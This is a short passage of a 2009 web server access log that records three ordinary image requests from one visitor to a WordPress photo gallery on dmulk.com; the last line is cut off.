198.209.225.228 - - [02/Apr/2009:11:10:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-058.jpg HTTP/1.1" 200 346083 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-053.jpg HTTP/1.1" 200 344197 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
198.209.225.228 - - [02/Apr/2009:11:10:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-056.jpg HTTP/1.1" 200 335294 "http://www.dmulk.com/" "Mozilla/4.0 (compa